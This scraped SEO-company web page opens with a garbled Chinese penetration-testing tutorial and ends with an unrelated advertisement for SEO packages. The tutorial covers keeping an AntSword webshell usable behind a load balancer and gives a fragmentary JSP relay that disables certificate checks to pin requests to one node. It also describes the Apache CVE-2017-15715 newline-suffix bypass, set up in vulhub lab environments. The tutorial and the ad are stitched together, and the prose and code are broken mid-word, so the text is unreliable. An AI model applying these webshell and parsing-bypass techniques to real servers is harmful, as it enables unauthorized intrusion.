Products
96SEO 2026-02-20 08:36 3
器去执行难点三当我们需要上传一些工具时麻烦来了难点四由于目标机器不能出外网3、环境搭建解决方法1、关机或者停服2、执行前先判断IP要不要执行3、在Web
流量转发二、apache换行解析漏洞一、负载均衡反向代理下的webshell上传
名称策略轮询默认按请求顺序逐一分配weight根据权重分配ip_hash根据客户端IP分配least_conn根据连接数分配fair
难点一需要在每一台节点的相同位置上传相同内容的webshell
WebShell一旦有一台机器上没有那么在请求轮到这台机器上的时候就会出现
我们在执行命令时无法知道下次的请求交给哪台机器去执行。
我们执行
时可以看到一直在飘因为我们用的是轮询的方式还算能确定一旦涉及了权重等其它指标就让你好好体验一波什么叫飘乎不定。
上传文件时采用的分片上传方式把一个文件分成了多次HTTP请求发送给了目标所以尴尬的事情来了两台节点上各一半而且这一半到底是怎么组合的取决于
环境搭建下载地址https://github.com/AntSwordProject/AntSword-Labs
/home/ztx/AntSword-Labs-master/loadbalance/loadbalance-jsp/docker-compose
首先在测试阶段我们可以关闭一台服务器只保留一台机器因为健康检查机制的存在很快其它的节点就会被
again.fi如果这里你的tomcat外网不能访问记得去Linux主机上的8080端口开放因为如果你要测试的话需要安装vim和net-tools这样一来确实是能够保证执行的命令是在我们想要的机器上了效果如图
这里一定要保证每一台node上都要有相同的文件千万别用上传上传会将文件分片
contentTypetext/html;charsetUTF-8
importjava.io.ByteArrayOutputStream
importjava.net.HttpURLConnection
importjava.security.KeyManagementException
importjava.security.NoSuchAlgorithmException
importjava.security.cert.CertificateException
importjava.security.cert.X509Certificate
true;}};trustAllHttpsCertificates();HttpsURLConnection.setDefaultHostnameVerifier(hv);}private
checkClientTrusted(X509Certificate[]
checkServerTrusted(X509Certificate[]
SSLContext.getInstance(TLS);sc.init(null,
java.security.SecureRandom());HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());}
http://172.19.0.2:8080/ant.jsp;URL
(https.equalsIgnoreCase(url.getProtocol()))
{ignoreSsl();}HttpURLConnection
(HttpURLConnection)url.openConnection();StringBuilder
StringBuilder();conn.setRequestMethod(request.getMethod());conn.setConnectTimeout(30000);conn.setDoOutput(true);conn.setDoInput(true);conn.setInstanceFollowRedirects(false);conn.connect();ByteArrayOutputStream
ByteArrayOutputStream();OutputStream
conn.getOutputStream();DataInputStream
DataInputStream(request.getInputStream());byte[]
len);}baos.flush();baos.writeTo(out2);baos.close();InputStream
conn.getInputStream();OutputStream
out3response.getOutputStream();int
len2);}out3.flush();out3.close();
HTTPD是一款HTTP服务器它可以通过mod_php来运行PHP网页。
其2.4.0~2.4.29版本中存在一个解析漏洞在解析PHP时1.php\x0A将被按照PHP后缀进行解析导致绕过一些服务器的安全策略。
环境下载链接https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715
搭建完毕后Apache运行在http://your-ip:8080
访问刚才上传的/1.php/x0a发现能够成功解析apache2.4会将他解析为php后缀但这个文件不是php后缀说明目标存在解析漏洞。
作为专业的SEO优化服务提供商,我们致力于通过科学、系统的搜索引擎优化策略,帮助企业在百度、Google等搜索引擎中获得更高的排名和流量。我们的服务涵盖网站结构优化、内容优化、技术SEO和链接建设等多个维度。
| 服务项目 | 基础套餐 | 标准套餐 | 高级定制 |
|---|---|---|---|
| 关键词优化数量 | 10-20个核心词 | 30-50个核心词+长尾词 | 80-150个全方位覆盖 |
| 内容优化 | 基础页面优化 | 全站内容优化+每月5篇原创 | 个性化内容策略+每月15篇原创 |
| 技术SEO | 基本技术检查 | 全面技术优化+移动适配 | 深度技术重构+性能优化 |
| 外链建设 | 每月5-10条 | 每月20-30条高质量外链 | 每月50+条多渠道外链 |
| 数据报告 | 月度基础报告 | 双周详细报告+分析 | 每周深度报告+策略调整 |
| 效果保障 | 3-6个月见效 | 2-4个月见效 | 1-3个月快速见效 |
我们的SEO优化服务遵循科学严谨的流程,确保每一步都基于数据分析和行业最佳实践:
全面检测网站技术问题、内容质量、竞争对手情况,制定个性化优化方案。
基于用户搜索意图和商业目标,制定全面的关键词矩阵和布局策略。
解决网站技术问题,优化网站结构,提升页面速度和移动端体验。
创作高质量原创内容,优化现有页面,建立内容更新机制。
获取高质量外部链接,建立品牌在线影响力,提升网站权威度。
持续监控排名、流量和转化数据,根据效果调整优化策略。
基于我们服务的客户数据统计,平均优化效果如下:
我们坚信,真正的SEO优化不仅仅是追求排名,而是通过提供优质内容、优化用户体验、建立网站权威,最终实现可持续的业务增长。我们的目标是与客户建立长期合作关系,共同成长。
Demand feedback
